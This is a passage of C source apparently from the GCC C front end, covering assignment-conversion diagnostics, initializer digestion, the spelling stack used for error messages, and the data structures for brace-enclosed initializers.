case ic_argpass:
{
const char msg[] = G_("passing argument %d of %qE from "
"pointer to non-enclosed address space");
if (warnopt)
warning_at (expr_loc, warnopt, msg, parmnum, rname);
else
error_at (expr_loc, msg, parmnum, rname);
break;
}
case ic_assign:
{
const char msg[] = G_("assignment from pointer to "
"non-enclosed address space");
if (warnopt)
warning_at (location, warnopt, msg);
else
error_at (location, msg);
break;
}
case ic_init:
{
const char msg[] = G_("initialization from pointer to "
"non-enclosed address space");
if (warnopt)
warning_at (location, warnopt, msg);
else
error_at (location, msg);
break;
}
case ic_return:
{
const char msg[] = G_("return from pointer to "
"non-enclosed address space");
if (warnopt)
warning_at (location, warnopt, msg);
else
error_at (location, msg);
break;
}
default:
gcc_unreachable ();
}
return error_mark_node;
}
/* Check if the right-hand side has a format attribute but the
left-hand side doesn't. */
if (warn_suggest_attribute_format
&& check_missing_format_attribute (type, rhstype))
{
switch (errtype)
{
case ic_argpass:
warning_at (expr_loc, OPT_Wsuggest_attribute_format,
"argument %d of %qE might be "
"a candidate for a format attribute",
parmnum, rname);
break;
case ic_assign:
warning_at (location, OPT_Wsuggest_attribute_format,
"assignment left-hand side might be "
"a candidate for a format attribute");
break;
case ic_init:
warning_at (location, OPT_Wsuggest_attribute_format,
"initialization left-hand side might be "
"a candidate for a format attribute");
break;
case ic_return:
warning_at (location, OPT_Wsuggest_attribute_format,
"return type might be "
"a candidate for a format attribute");
break;
default:
gcc_unreachable ();
}
}
/* Any non-function converts to a [const][volatile] void *
and vice versa; otherwise, targets must be the same.
Meanwhile, the lhs target must have all the qualifiers of the rhs. */
if ((VOID_TYPE_P (ttl) && !TYPE_ATOMIC (ttl))
|| (VOID_TYPE_P (ttr) && !TYPE_ATOMIC (ttr))
|| (target_cmp = comp_target_types (location, type, rhstype))
|| is_opaque_pointer
|| ((c_common_unsigned_type (mvl)
== c_common_unsigned_type (mvr))
&& (c_common_signed_type (mvl)
== c_common_signed_type (mvr))
&& TYPE_ATOMIC (mvl) == TYPE_ATOMIC (mvr)))
{
/* Warn about loss of qualifers from pointers to arrays with
qualifiers on the element type. */
if (TREE_CODE (ttr) == ARRAY_TYPE)
{
ttr = strip_array_types (ttr);
ttl = strip_array_types (ttl);
if (TYPE_QUALS_NO_ADDR_SPACE_NO_ATOMIC (ttr)
& ~TYPE_QUALS_NO_ADDR_SPACE_NO_ATOMIC (ttl))
WARNING_FOR_QUALIFIERS (location, expr_loc,
OPT_Wdiscarded_array_qualifiers,
G_("passing argument %d of %qE discards "
"%qv qualifier from pointer target type"),
G_("assignment discards %qv qualifier "
"from pointer target type"),
G_("initialization discards %qv qualifier "
"from pointer target type"),
G_("return discards %qv qualifier from "
"pointer target type"),
TYPE_QUALS (ttr) & ~TYPE_QUALS (ttl));
}
else if (pedantic
&& ((VOID_TYPE_P (ttl) && TREE_CODE (ttr) == FUNCTION_TYPE)
||
(VOID_TYPE_P (ttr)
&& !null_pointer_constant
&& TREE_CODE (ttl) == FUNCTION_TYPE)))
PEDWARN_FOR_ASSIGNMENT (location, expr_loc, OPT_Wpedantic,
G_("ISO C forbids passing argument %d of "
"%qE between function pointer "
"and %<void *%>"),
G_("ISO C forbids assignment between "
"function pointer and %<void *%>"),
G_("ISO C forbids initialization between "
"function pointer and %<void *%>"),
G_("ISO C forbids return between function "
"pointer and %<void *%>"));
/* Const and volatile mean something different for function types,
so the usual warnings are not appropriate. */
else if (TREE_CODE (ttr) != FUNCTION_TYPE
&& TREE_CODE (ttl) != FUNCTION_TYPE)
{
/* Don't warn about loss of qualifier for conversions from
qualified void* to pointers to arrays with corresponding
qualifier on the element type. */
if (!pedantic)
ttl = strip_array_types (ttl);
/* Assignments between atomic and non-atomic objects are OK. */
if (TYPE_QUALS_NO_ADDR_SPACE_NO_ATOMIC (ttr)
& ~TYPE_QUALS_NO_ADDR_SPACE_NO_ATOMIC (ttl))
{
PEDWARN_FOR_QUALIFIERS (location, expr_loc,
OPT_Wdiscarded_qualifiers,
G_("passing argument %d of %qE discards "
"%qv qualifier from pointer target type"),
G_("assignment discards %qv qualifier "
"from pointer target type"),
G_("initialization discards %qv qualifier "
"from pointer target type"),
G_("return discards %qv qualifier from "
"pointer target type"),
TYPE_QUALS (ttr) & ~TYPE_QUALS (ttl));
}
/* If this is not a case of ignoring a mismatch in signedness,
no warning. */
else if (VOID_TYPE_P (ttl) || VOID_TYPE_P (ttr)
|| target_cmp)
;
/* If there is a mismatch, do warn. */
else if (warn_pointer_sign)
switch (errtype)
{
case ic_argpass:
{
auto_diagnostic_group d;
range_label_for_type_mismatch rhs_label (rhstype, type);
gcc_rich_location richloc (expr_loc, &rhs_label);
if (pedwarn (&richloc, OPT_Wpointer_sign,
"pointer targets in passing argument %d of "
"%qE differ in signedness", parmnum, rname))
inform_for_arg (fundecl, expr_loc, parmnum, type,
rhstype);
}
break;
case ic_assign:
pedwarn (location, OPT_Wpointer_sign,
"pointer targets in assignment from %qT to %qT "
"differ in signedness", rhstype, type);
break;
case ic_init:
pedwarn_init (location, OPT_Wpointer_sign,
"pointer targets in initialization of %qT "
"from %qT differ in signedness", type,
rhstype);
break;
case ic_return:
pedwarn (location, OPT_Wpointer_sign, "pointer targets in "
"returning %qT from a function with return type "
"%qT differ in signedness", rhstype, type);
break;
default:
gcc_unreachable ();
}
}
else if (TREE_CODE (ttl) == FUNCTION_TYPE
&& TREE_CODE (ttr) == FUNCTION_TYPE)
{
/* Because const and volatile on functions are restrictions
that say the function will not do certain things,
it is okay to use a const or volatile function
where an ordinary one is wanted, but not vice-versa. */
if (TYPE_QUALS_NO_ADDR_SPACE (ttl)
& ~TYPE_QUALS_NO_ADDR_SPACE (ttr))
PEDWARN_FOR_QUALIFIERS (location, expr_loc,
OPT_Wdiscarded_qualifiers,
G_("passing argument %d of %qE makes "
"%q#v qualified function pointer "
"from unqualified"),
G_("assignment makes %q#v qualified function "
"pointer from unqualified"),
G_("initialization makes %q#v qualified "
"function pointer from unqualified"),
G_("return makes %q#v qualified function "
"pointer from unqualified"),
TYPE_QUALS (ttl) & ~TYPE_QUALS (ttr));
}
}
/* Avoid warning about the volatile ObjC EH puts on decls. */
else if (!objc_ok)
{
switch (errtype)
{
case ic_argpass:
{
auto_diagnostic_group d;
range_label_for_type_mismatch rhs_label (rhstype, type);
gcc_rich_location richloc (expr_loc, &rhs_label);
if (pedwarn (&richloc, OPT_Wincompatible_pointer_types,
"passing argument %d of %qE from incompatible "
"pointer type", parmnum, rname))
inform_for_arg (fundecl, expr_loc, parmnum, type, rhstype);
}
break;
case ic_assign:
if (bltin)
pedwarn (location, OPT_Wincompatible_pointer_types,
"assignment to %qT from pointer to "
"%qD with incompatible type %qT",
type, bltin, rhstype);
else
pedwarn (location, OPT_Wincompatible_pointer_types,
"assignment to %qT from incompatible pointer type %qT",
type, rhstype);
break;
case ic_init:
if (bltin)
pedwarn_init (location, OPT_Wincompatible_pointer_types,
"initialization of %qT from pointer to "
"%qD with incompatible type %qT",
type, bltin, rhstype);
else
pedwarn_init (location, OPT_Wincompatible_pointer_types,
"initialization of %qT from incompatible "
"pointer type %qT",
type, rhstype);
break;
case ic_return:
if (bltin)
pedwarn (location, OPT_Wincompatible_pointer_types,
"returning pointer to %qD of type %qT from "
"a function with incompatible type %qT",
bltin, rhstype, type);
else
pedwarn (location, OPT_Wincompatible_pointer_types,
"returning %qT from a function with incompatible "
"return type %qT", rhstype, type);
break;
default:
gcc_unreachable ();
}
}
/* If RHS isn't an address, check pointer or array of packed
struct or union. */
warn_for_address_or_pointer_of_packed_member (type, orig_rhs);
return convert (type, rhs);
}
else if (codel == POINTER_TYPE && coder == ARRAY_TYPE)
{
/* ??? This should not be an error when inlining calls to
unprototyped functions. */
const char msg[] = "invalid use of non-lvalue array";
if (warnopt)
warning_at (location, warnopt, msg);
else
error_at (location, msg);
return error_mark_node;
}
else if (codel == POINTER_TYPE && coder == INTEGER_TYPE)
{
/* An explicit constant 0 can convert to a pointer,
or one that results from arithmetic, even including
a cast to integer type. */
if (!null_pointer_constant)
switch (errtype)
{
case ic_argpass:
{
auto_diagnostic_group d;
range_label_for_type_mismatch rhs_label (rhstype, type);
gcc_rich_location richloc (expr_loc, &rhs_label);
if (pedwarn (&richloc, OPT_Wint_conversion,
"passing argument %d of %qE makes pointer from "
"integer without a cast", parmnum, rname))
inform_for_arg (fundecl, expr_loc, parmnum, type, rhstype);
}
break;
case ic_assign:
pedwarn (location, OPT_Wint_conversion,
"assignment to %qT from %qT makes pointer from integer "
"without a cast", type, rhstype);
break;
case ic_init:
pedwarn_init (location, OPT_Wint_conversion,
"initialization of %qT from %qT makes pointer from "
"integer without a cast", type, rhstype);
break;
case ic_return:
pedwarn (location, OPT_Wint_conversion, "returning %qT from a "
"function with return type %qT makes pointer from "
"integer without a cast", rhstype, type);
break;
default:
gcc_unreachable ();
}
return convert (type, rhs);
}
else if (codel == INTEGER_TYPE && coder == POINTER_TYPE)
{
switch (errtype)
{
case ic_argpass:
{
auto_diagnostic_group d;
range_label_for_type_mismatch rhs_label (rhstype, type);
gcc_rich_location richloc (expr_loc, &rhs_label);
if (pedwarn (&richloc, OPT_Wint_conversion,
"passing argument %d of %qE makes integer from "
"pointer without a cast", parmnum, rname))
inform_for_arg (fundecl, expr_loc, parmnum, type, rhstype);
}
break;
case ic_assign:
pedwarn (location, OPT_Wint_conversion,
"assignment to %qT from %qT makes integer from pointer "
"without a cast", type, rhstype);
break;
case ic_init:
pedwarn_init (location, OPT_Wint_conversion,
"initialization of %qT from %qT makes integer from "
"pointer without a cast", type, rhstype);
break;
case ic_return:
pedwarn (location, OPT_Wint_conversion, "returning %qT from a "
"function with return type %qT makes integer from "
"pointer without a cast", rhstype, type);
break;
default:
gcc_unreachable ();
}
return convert (type, rhs);
}
else if (codel == BOOLEAN_TYPE && coder == POINTER_TYPE)
{
tree ret;
bool save = in_late_binary_op;
in_late_binary_op = true;
ret = convert (type, rhs);
in_late_binary_op = save;
return ret;
}
switch (errtype)
{
case ic_argpass:
{
auto_diagnostic_group d;
range_label_for_type_mismatch rhs_label (rhstype, type);
gcc_rich_location richloc (expr_loc, &rhs_label);
const char msg[] = G_("incompatible type for argument %d of %qE");
if (warnopt)
warning_at (expr_loc, warnopt, msg, parmnum, rname);
else
error_at (&richloc, msg, parmnum, rname);
inform_for_arg (fundecl, expr_loc, parmnum, type, rhstype);
}
break;
case ic_assign:
{
const char msg[]
= G_("incompatible types when assigning to type %qT from type %qT");
if (warnopt)
warning_at (expr_loc, 0, msg, type, rhstype);
else
error_at (expr_loc, msg, type, rhstype);
break;
}
case ic_init:
{
const char msg[]
= G_("incompatible types when initializing type %qT using type %qT");
if (warnopt)
warning_at (location, 0, msg, type, rhstype);
else
error_at (location, msg, type, rhstype);
break;
}
case ic_return:
{
const char msg[]
= G_("incompatible types when returning type %qT but %qT was expected");
if (warnopt)
warning_at (location, 0, msg, rhstype, type);
else
error_at (location, msg, rhstype, type);
break;
}
default:
gcc_unreachable ();
}
return error_mark_node;
}
/* If VALUE is a compound expr all of whose expressions are constant, then
return its value. Otherwise, return error_mark_node.
This is for handling COMPOUND_EXPRs as initializer elements
which is allowed with a warning when -pedantic is specified. */
static tree
valid_compound_expr_initializer (tree value, tree endtype)
{
if (TREE_CODE (value) == COMPOUND_EXPR)
{
if (valid_compound_expr_initializer (TREE_OPERAND (value, 0), endtype)
== error_mark_node)
return error_mark_node;
return valid_compound_expr_initializer (TREE_OPERAND (value, 1),
endtype);
}
else if (!initializer_constant_valid_p (value, endtype))
return error_mark_node;
else
return value;
}
/* Perform appropriate conversions on the initial value of a variable,
store it in the declaration DECL,
and print any error messages that are appropriate.
If ORIGTYPE is not NULL_TREE, it is the original type of INIT.
If the init is invalid, store an ERROR_MARK.
INIT_LOC is the location of the initial value. */
void
store_init_value (location_t init_loc, tree decl, tree init, tree origtype)
{
tree value, type;
bool npc = false;
/* If variable's type was invalidly declared, just ignore it. */
type = TREE_TYPE (decl);
if (TREE_CODE (type) == ERROR_MARK)
return;
/* Digest the specified initializer into an expression. */
if (init)
npc = null_pointer_constant_p (init);
value = digest_init (init_loc, type, init, origtype, npc,
true, TREE_STATIC (decl));
/* Store the expression if valid; else report error. */
if (!in_system_header_at (input_location)
&& AGGREGATE_TYPE_P (TREE_TYPE (decl)) && !TREE_STATIC (decl))
warning (OPT_Wtraditional, "traditional C rejects automatic "
"aggregate initialization");
if (value != error_mark_node || TREE_CODE (decl) != FUNCTION_DECL)
DECL_INITIAL (decl) = value;
/* ANSI wants warnings about out-of-range constant initializers. */
STRIP_TYPE_NOPS (value);
if (TREE_STATIC (decl))
constant_expression_warning (value);
/* Check if we need to set array size from compound literal size. */
if (TREE_CODE (type) == ARRAY_TYPE
&& TYPE_DOMAIN (type) == NULL_TREE
&& value != error_mark_node)
{
tree inside_init = init;
STRIP_TYPE_NOPS (inside_init);
inside_init = fold (inside_init);
if (TREE_CODE (inside_init) == COMPOUND_LITERAL_EXPR)
{
tree cldecl = COMPOUND_LITERAL_EXPR_DECL (inside_init);
if (TYPE_DOMAIN (TREE_TYPE (cldecl)))
{
/* For int foo[] = (int [3]){1}; we need to set array size
now since later on array initializer will be just the
brace enclosed list of the compound literal. */
tree etype = strip_array_types (TREE_TYPE (decl));
type = build_distinct_type_copy (TYPE_MAIN_VARIANT (type));
TYPE_DOMAIN (type) = TYPE_DOMAIN (TREE_TYPE (cldecl));
layout_type (type);
layout_decl (cldecl, 0);
TREE_TYPE (decl)
= c_build_qualified_type (type, TYPE_QUALS (etype));
}
}
}
}
/* Methods for storing and printing names for error messages. */
/* Implement a spelling stack that allows components of a name to be pushed
and popped. Each element on the stack is this structure. */
struct spelling
{
int kind;
union
{
unsigned HOST_WIDE_INT i;
const char *s;
} u;
};
#define SPELLING_STRING 1
#define SPELLING_MEMBER 2
#define SPELLING_BOUNDS 3
static struct spelling *spelling; /* Next stack element (unused). */
static struct spelling *spelling_base; /* Spelling stack base. */
static int spelling_size; /* Size of the spelling stack. */
/* Macros to save and restore the spelling stack around push_... functions.
Alternative to SAVE_SPELLING_STACK. */
#define SPELLING_DEPTH() (spelling - spelling_base)
#define RESTORE_SPELLING_DEPTH(DEPTH) (spelling = spelling_base + (DEPTH))
/* Push an element on the spelling stack with type KIND and assign VALUE
to MEMBER. */
#define PUSH_SPELLING(KIND, VALUE, MEMBER) \
{ \
int depth = SPELLING_DEPTH (); \
\
if (depth >= spelling_size) \
{ \
spelling_size += 10; \
spelling_base = XRESIZEVEC (struct spelling, spelling_base, \
spelling_size); \
RESTORE_SPELLING_DEPTH (depth); \
} \
\
spelling->kind = (KIND); \
spelling->MEMBER = (VALUE); \
spelling++; \
}
/* Push STRING on the stack. Printed literally. */
static void
push_string (const char *string)
{
PUSH_SPELLING (SPELLING_STRING, string, u.s);
}
/* Push a member name on the stack. Printed as '.' STRING. */
static void
push_member_name (tree decl)
{
const char *const string
= (DECL_NAME (decl)
? identifier_to_locale (IDENTIFIER_POINTER (DECL_NAME (decl)))
: _("<anonymous>"));
PUSH_SPELLING (SPELLING_MEMBER, string, u.s);
}
/* Push an array bounds on the stack. Printed as [BOUNDS]. */
static void
push_array_bounds (unsigned HOST_WIDE_INT bounds)
{
PUSH_SPELLING (SPELLING_BOUNDS, bounds, u.i);
}
/* Compute the maximum size in bytes of the printed spelling. */
static int
spelling_length (void)
{
int size = 0;
struct spelling *p;
for (p = spelling_base; p < spelling; p++)
{
if (p->kind == SPELLING_BOUNDS)
size += 25;
else
size += strlen (p->u.s) + 1;
}
return size;
}
/* Print the spelling to BUFFER and return it. */
static char *
print_spelling (char *buffer)
{
char *d = buffer;
struct spelling *p;
for (p = spelling_base; p < spelling; p++)
if (p->kind == SPELLING_BOUNDS)
{
sprintf (d, "[" HOST_WIDE_INT_PRINT_UNSIGNED "]", p->u.i);
d += strlen (d);
}
else
{
const char *s;
if (p->kind == SPELLING_MEMBER)
*d++ = '.';
for (s = p->u.s; (*d = *s++); d++)
;
}
*d++ = '\0';
return buffer;
}
/* Digest the parser output INIT as an initializer for type TYPE.
Return a C expression of type TYPE to represent the initial value.
If ORIGTYPE is not NULL_TREE, it is the original type of INIT.
NULL_POINTER_CONSTANT is true if INIT is a null pointer constant.
If INIT is a string constant, STRICT_STRING is true if it is
unparenthesized or we should not warn here for it being parenthesized.
For other types of INIT, STRICT_STRING is not used.
INIT_LOC is the location of the INIT.
REQUIRE_CONSTANT requests an error if non-constant initializers or
elements are seen. */
static tree
digest_init (location_t init_loc, tree type, tree init, tree origtype,
bool null_pointer_constant, bool strict_string,
int require_constant)
{
enum tree_code code = TREE_CODE (type);
tree inside_init = init;
tree semantic_type = NULL_TREE;
bool maybe_const = true;
if (type == error_mark_node
|| !init
|| error_operand_p (init))
return error_mark_node;
STRIP_TYPE_NOPS (inside_init);
if (TREE_CODE (inside_init) == EXCESS_PRECISION_EXPR)
{
semantic_type = TREE_TYPE (inside_init);
inside_init = TREE_OPERAND (inside_init, 0);
}
inside_init = c_fully_fold (inside_init, require_constant, &maybe_const);
/* Initialization of an array of chars from a string constant
optionally enclosed in braces. */
if (code == ARRAY_TYPE && inside_init
&& TREE_CODE (inside_init) == STRING_CST)
{
tree typ1
= (TYPE_ATOMIC (TREE_TYPE (type))
? c_build_qualified_type (TYPE_MAIN_VARIANT (TREE_TYPE (type)),
TYPE_QUAL_ATOMIC)
: TYPE_MAIN_VARIANT (TREE_TYPE (type)));
/* Note that an array could be both an array of character type
and an array of wchar_t if wchar_t is signed char or unsigned
char. */
bool char_array = (typ1 == char_type_node
|| typ1 == signed_char_type_node
|| typ1 == unsigned_char_type_node);
bool wchar_array = !!comptypes (typ1, wchar_type_node);
bool char16_array = !!comptypes (typ1, char16_type_node);
bool char32_array = !!comptypes (typ1, char32_type_node);
if (char_array || wchar_array || char16_array || char32_array)
{
struct c_expr expr;
tree typ2 = TYPE_MAIN_VARIANT (TREE_TYPE (TREE_TYPE (inside_init)));
bool incompat_string_cst = false;
expr.value = inside_init;
expr.original_code = (strict_string ? STRING_CST : ERROR_MARK);
expr.original_type = NULL;
maybe_warn_string_init (init_loc, type, expr);
if (TYPE_DOMAIN (type) && !TYPE_MAX_VALUE (TYPE_DOMAIN (type)))
pedwarn_init (init_loc, OPT_Wpedantic,
"initialization of a flexible array member");
if (comptypes (TYPE_MAIN_VARIANT (TREE_TYPE (inside_init)),
TYPE_MAIN_VARIANT (type)))
return inside_init;
if (char_array)
{
if (typ2 != char_type_node)
incompat_string_cst = true;
}
else if (!comptypes (typ1, typ2))
incompat_string_cst = true;
if (incompat_string_cst)
{
error_init (init_loc, "cannot initialize array of %qT from "
"a string literal with type array of %qT",
typ1, typ2);
return error_mark_node;
}
if (TYPE_DOMAIN (type) != NULL_TREE
&& TYPE_SIZE (type) != NULL_TREE
&& TREE_CODE (TYPE_SIZE (type)) == INTEGER_CST)
{
unsigned HOST_WIDE_INT len = TREE_STRING_LENGTH (inside_init);
unsigned unit = TYPE_PRECISION (typ1) / BITS_PER_UNIT;
/* Subtract the size of a single (possibly wide) character
because it's ok to ignore the terminating null char
that is counted in the length of the constant. */
if (compare_tree_int (TYPE_SIZE_UNIT (type), len - unit) < 0)
pedwarn_init (init_loc, 0,
("initializer-string for array of %qT "
"is too long"), typ1);
else if (warn_cxx_compat
&& compare_tree_int (TYPE_SIZE_UNIT (type), len) < 0)
warning_at (init_loc, OPT_Wc___compat,
("initializer-string for array of %qT "
"is too long for C++"), typ1);
if (compare_tree_int (TYPE_SIZE_UNIT (type), len) < 0)
{
unsigned HOST_WIDE_INT size
= tree_to_uhwi (TYPE_SIZE_UNIT (type));
const char *p = TREE_STRING_POINTER (inside_init);
inside_init = build_string (size, p);
}
}
TREE_TYPE (inside_init) = type;
return inside_init;
}
else if (INTEGRAL_TYPE_P (typ1))
{
error_init (init_loc, "array of inappropriate type initialized "
"from string constant");
return error_mark_node;
}
}
/* Build a VECTOR_CST from a *constant* vector constructor. If the
vector constructor is not constant (e.g. {1,2,3,foo()}) then punt
below and handle as a constructor. */
if (code == VECTOR_TYPE
&& VECTOR_TYPE_P (TREE_TYPE (inside_init))
&& vector_types_convertible_p (TREE_TYPE (inside_init), type, true)
&& TREE_CONSTANT (inside_init))
{
if (TREE_CODE (inside_init) == VECTOR_CST
&& comptypes (TYPE_MAIN_VARIANT (TREE_TYPE (inside_init)),
TYPE_MAIN_VARIANT (type)))
return inside_init;
if (TREE_CODE (inside_init) == CONSTRUCTOR)
{
unsigned HOST_WIDE_INT ix;
tree value;
bool constant_p = true;
/* Iterate through elements and check if all constructor
elements are *_CSTs. */
FOR_EACH_CONSTRUCTOR_VALUE (CONSTRUCTOR_ELTS (inside_init), ix, value)
if (!CONSTANT_CLASS_P (value))
{
constant_p = false;
break;
}
if (constant_p)
return build_vector_from_ctor (type,
CONSTRUCTOR_ELTS (inside_init));
}
}
if (warn_sequence_point)
verify_sequence_points (inside_init);
/* Any type can be initialized
from an expression of the same type, optionally with braces. */
if (inside_init && TREE_TYPE (inside_init) != NULL_TREE
&& (comptypes (TYPE_MAIN_VARIANT (TREE_TYPE (inside_init)),
TYPE_MAIN_VARIANT (type))
|| (code == ARRAY_TYPE
&& comptypes (TREE_TYPE (inside_init), type))
|| (gnu_vector_type_p (type)
&& comptypes (TREE_TYPE (inside_init), type))
|| (code == POINTER_TYPE
&& TREE_CODE (TREE_TYPE (inside_init)) == ARRAY_TYPE
&& comptypes (TREE_TYPE (TREE_TYPE (inside_init)),
TREE_TYPE (type)))))
{
if (code == POINTER_TYPE)
{
if (TREE_CODE (TREE_TYPE (inside_init)) == ARRAY_TYPE)
{
if (TREE_CODE (inside_init) == STRING_CST
|| TREE_CODE (inside_init) == COMPOUND_LITERAL_EXPR)
inside_init = array_to_pointer_conversion
(init_loc, inside_init);
else
{
error_init (init_loc, "invalid use of non-lvalue array");
return error_mark_node;
}
}
}
if (code == VECTOR_TYPE)
/* Although the types are compatible, we may require a
conversion. */
inside_init = convert (type, inside_init);
if (require_constant
&& TREE_CODE (inside_init) == COMPOUND_LITERAL_EXPR)
{
/* As an extension, allow initializing objects with static storage
duration with compound literals (which are then treated just as
the brace enclosed list they contain). Also allow this for
vectors, as we can only assign them with compound literals. */
if (flag_isoc99 && code != VECTOR_TYPE)
pedwarn_init (init_loc, OPT_Wpedantic, "initializer element "
"is not constant");
tree decl = COMPOUND_LITERAL_EXPR_DECL (inside_init);
inside_init = DECL_INITIAL (decl);
}
if (code == ARRAY_TYPE && TREE_CODE (inside_init) != STRING_CST
&& TREE_CODE (inside_init) != CONSTRUCTOR)
{
error_init (init_loc, "array initialized from non-constant array "
"expression");
return error_mark_node;
}
/* Compound expressions can only occur here if -Wpedantic or
-pedantic-errors is specified. In the later case, we always want
an error. In the former case, we simply want a warning. */
if (require_constant && pedantic
&& TREE_CODE (inside_init) == COMPOUND_EXPR)
{
inside_init
= valid_compound_expr_initializer (inside_init,
TREE_TYPE (inside_init));
if (inside_init == error_mark_node)
error_init (init_loc, "initializer element is not constant");
else
pedwarn_init (init_loc, OPT_Wpedantic,
"initializer element is not constant");
if (flag_pedantic_errors)
inside_init = error_mark_node;
}
else if (require_constant
&& !initializer_constant_valid_p (inside_init,
TREE_TYPE (inside_init)))
{
error_init (init_loc, "initializer element is not constant");
inside_init = error_mark_node;
}
else if (require_constant && !maybe_const)
pedwarn_init (init_loc, OPT_Wpedantic,
"initializer element is not a constant expression");
/* Added to enable additional -Wsuggest-attribute=format warnings. */
if (TREE_CODE (TREE_TYPE (inside_init)) == POINTER_TYPE)
inside_init = convert_for_assignment (init_loc, UNKNOWN_LOCATION,
type, inside_init, origtype,
ic_init, null_pointer_constant,
NULL_TREE, NULL_TREE, 0);
return inside_init;
}
/* Handle scalar types, including conversions. */
if (code == INTEGER_TYPE || code == REAL_TYPE || code == FIXED_POINT_TYPE
|| code == POINTER_TYPE || code == ENUMERAL_TYPE || code == BOOLEAN_TYPE
|| code == COMPLEX_TYPE || code == VECTOR_TYPE)
{
if (TREE_CODE (TREE_TYPE (init)) == ARRAY_TYPE
&& (TREE_CODE (init) == STRING_CST
|| TREE_CODE (init) == COMPOUND_LITERAL_EXPR))
inside_init = init = array_to_pointer_conversion (init_loc, init);
if (semantic_type)
inside_init = build1 (EXCESS_PRECISION_EXPR, semantic_type,
inside_init);
inside_init
= convert_for_assignment (init_loc, UNKNOWN_LOCATION, type,
inside_init, origtype, ic_init,
null_pointer_constant, NULL_TREE, NULL_TREE,
0);
/* Check to see if we have already given an error message. */
if (inside_init == error_mark_node)
;
else if (require_constant && !TREE_CONSTANT (inside_init))
{
error_init (init_loc, "initializer element is not constant");
inside_init = error_mark_node;
}
else if (require_constant
&& !initializer_constant_valid_p (inside_init,
TREE_TYPE (inside_init)))
{
error_init (init_loc, "initializer element is not computable at "
"load time");
inside_init = error_mark_node;
}
else if (require_constant && !maybe_const)
pedwarn_init (init_loc, OPT_Wpedantic,
"initializer element is not a constant expression");
return inside_init;
}
/* Come here only for records and arrays. */
if (COMPLETE_TYPE_P (type) && TREE_CODE (TYPE_SIZE (type)) != INTEGER_CST)
{
error_init (init_loc, "variable-sized object may not be initialized");
return error_mark_node;
}
error_init (init_loc, "invalid initializer");
return error_mark_node;
}
/* Handle initializers that use braces. */
/* Type of object we are accumulating a constructor for.
This type is always a RECORD_TYPE, UNION_TYPE or ARRAY_TYPE. */
static tree constructor_type;
/* For a RECORD_TYPE or UNION_TYPE, this is the chain of fields
left to fill. */
static tree constructor_fields;
/* For an ARRAY_TYPE, this is the specified index
at which to store the next element we get. */
static tree constructor_index;
/* For an ARRAY_TYPE, this is the maximum index. */
static tree constructor_max_index;
/* For a RECORD_TYPE, this is the first field not yet written out. */
static tree constructor_unfilled_fields;
/* For an ARRAY_TYPE, this is the index of the first element
not yet written out. */
static tree constructor_unfilled_index;
/* In a RECORD_TYPE, the byte index of the next consecutive field.
This is so we can generate gaps between fields, when appropriate. */
static tree constructor_bit_index;
/* If we are saving up the elements rather than allocating them,
this is the list of elements so far (in reverse order,
most recent first). */
static vec<constructor_elt, va_gc> *constructor_elements;
/* 1 if constructor should be incrementally stored into a constructor chain,
0 if all the elements should be kept in AVL tree. */
static int constructor_incremental;
/* 1 if so far this constructor's elements are all compile-time constants. */
static int constructor_constant;
/* 1 if so far this constructor's elements are all valid address constants. */
static int constructor_simple;
/* 1 if this constructor has an element that cannot be part of a
constant expression. */
static int constructor_nonconst;
/* 1 if this constructor is erroneous so far. */
static int constructor_erroneous;
/* 1 if this constructor is the universal zero initializer { 0 }. */
static int constructor_zeroinit;
/* Structure for managing pending initializer elements, organized as an
AVL tree. */
struct init_node
{
struct init_node *left, *right;
struct init_node *parent;
int balance;
tree purpose;
tree value;
tree origtype;
};
/* Tree of pending elements at this constructor level.
These are elements encountered out of order
which belong at places we haven't reached yet in actually
writing the output.
Will never hold tree nodes across GC runs. */
static struct init_node *constructor_pending_elts;
/* The SPELLING_DEPTH of this constructor. */
static int constructor_depth;
/* DECL node for which an initializer is being read.
0 means we are reading a constructor expression
such as (struct foo) {...}. */
static tree constructor_decl;
/* Nonzero if this is an initializer for a top-level decl. */
static int constructor_top_level;
/* Nonzero if there were any member designators in this initializer. */
static int constructor_designated;
/* Nesting depth of designator list. */
static int designator_depth;
/* Nonzero if there were diagnosed errors in this designator list. */
static int designator_erroneous;
/* This stack has a level for each implicit or explicit level of
structuring in the initializer, including the outermost one. It
saves the values of most of the variables above. */
struct constructor_range_stack;
struct constructor_stack
{
struct constructor_stack *next;
tree type;
tree fields;
tree index;
tree max_index;
tree unfilled_index;
tree unfilled_fields;
tree bit_index;
vec<constructor_elt, va_gc> *elements;
struct init_node *pending_elts;
int offset;
int depth;
/* If value nonzero, this value should replace the entire
constructor at this level. */
struct c_expr replacement_value;
struct constructor_range_stack *range_stack;
char constant;
char simple;
char nonconst;
char implicit;
char erroneous;
char outer;
char incremental;
char designated;
int designator_depth;
};
static struct constructor_stack *constructor_stack;
/* This stack represents designators from some range designator up to
the last designator in the list. */
struct constructor_range_stack
{
struct constructor_range_stack *next, *prev;
struct constructor_stack *stack;
tree range_start;
tree index;
tree range_end;
tree fields;
};
static struct constructor_range_stack *constructor_range_stack;
/* This stack records separate initializers that are nested.
Nested initializers can't happen in ANSI C, but GNU C allows them
in cases like { ... (struct foo) { ... } ... }. */
struct initializer_stack
{
struct initializer_stack *next;
tree decl;
struct constructor_stack *constructor_stack;
struct constructor_range_stack *constructor_range_stack;
vec<constructor_elt, va_gc> *elements;
struct spelling *spelling;
struct spelling *spelling_base;
int spelling_size;
char top_level;
char require_constant_value;
char require_constant_elements;
rich_location *missing_brace_richloc;
};
static struct initializer_stack *initializer_stack;
/* Prepare to parse and output the initializer for variable DECL. */
void
start_init (tree decl, tree asmspec_tree ATTRIBUTE_UNUSED, int top_level,
rich_location *richloc)
{
const char *locus;
struct initializer_stack *p = XNEW (struct initializer_stack);
p->decl = constructor_decl;
p->require_constant_value = require_constant_value;
p->require_constant_elements = require_constant_elements;
p->constructor_stack = constructor_stack;
p->constructor_range_stack = constructor_range_stack;
p->elements = constructor_elements;
p->spelling = spelling;
p->spelling_base = spelling_base;
p->spelling_size = spelling_size;
p->top_level = constructor_top_level;
p->next = initializer_stack;
p->missing_brace_richloc = richloc;
initializer_stack = p;
constructor_decl = decl;
constructor_designated = 0;
constructor_top_level = top_level;
if (decl != NULL_TREE && decl != error_mark_node)
{
require_constant_value = TREE_STATIC (decl);
require_constant_elements
= ((TREE_STATIC (decl) || (pedantic && !flag_isoc99))
/* For a scalar, you can always use any value to initialize,
even within braces. */
&& AGGREGATE_TYPE_P (TREE_TYPE (decl)));
locus = identifier_to_locale (IDENTIFIER_POINTER (DECL_NAME (decl)));
}
else
{
